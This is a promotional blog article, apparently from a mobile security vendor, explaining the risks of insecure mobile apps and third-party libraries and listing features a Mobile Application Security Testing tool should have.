Every month, thousands of mobile applications are released and the amount of apps available on stores is currently estimated to be over 4 millions. In a recent study, the Ponemon institute identified that 60% of IT security leaders reported a data breach caused by an insecure mobile app, meanwhile only 29% of mobile applications are being tested for vulnerabilities.
As a consequence,Gartner predicted in its last Market Guide for Mobile Application Security Testing that by 2020, up to 90% of enterprises will test mobile applications.
A MOBILE APPLICATION CAN HAVE TWO KINDS OF SECURITY HOLES
1. Unwanted / unexpected behaviors
Usually, such flaws come along with third-party librairies. Libraries are designed for specific services (payment, analytics…) and embedded into applications. As they come from external companies, developers don’t have the hand over their source code. Very often, these libraries silently perform unnecessary actions (such as connections to unknown servers) and leak data.
Coming from either the source code of the app itself or from a library, a mobile app can possibly feature one or several vulnerabilities. The OWASP community references the Top 10 mobile vulnerabilities as part of its Mobile Security Project. In total, there are hundreds of them potentially making apps vulnerable to attacks.
The various data protection regulations across the world (GDPR, PIPEDA, FTC Act…) advise companies to use all means available in order to protect data. Whether they develop apps for their employees, partners or end-users, companies must test the security levels of the apps they release to prevent them from data leakage and security breach. There are different solutions on the market to test mobile applications security at any stage of the development cycle.
THE REQUIREMENTS A MAST TOOL MUST ANSWER
- SDLC integration & Ready-to-use platform: Whether a company wants to test an app along its development cycle or after it’s been developed, it’s convenient to use a solution that allows doing both. Having the choice between a ready-to-use platform and an API that integrates into SDLC (System Development Life Cycle) will offer more flexibility and adapt to companies evolving needs.
- Customizable security levels: Because applications deal with data of different levels of sensitivity depending on the service they offer, they require to be tested accordingly. A testing solution that allows customizing security levels will provide a precise answer to the security needs.
- One tool for every environment: Most of the time, applications have Android and iOS versions, and sometimes also Windows UI. It’s better to centralize the testing of all these apps using only one solution, compliant with every OS.
- Static and dynamic behavioral analyses: An application could seem safe just by looking at its code, but performs suspicious actions once executed. To get a complete assessment and no false positive, both static and dynamic analyses have to be performed.
- Vulnerabilities identification: In our last report, we identified that 25% applications were embedding one or more vulnerabilities, including the most popular ones such as Uber (as shown in this Uber App analysis). Pointing them out during the testing process is required to reinforce security.
- The remediation phase occurs once an app has been tested and its points of failure have been identified. More than just providing a list of vulnerabilities and suspicious behaviors, some solutions offer in-depth advices on how to remediate apps and even provide an automatic remediation procedure. Adopting a solution that delivers this service will ease corrective actions process.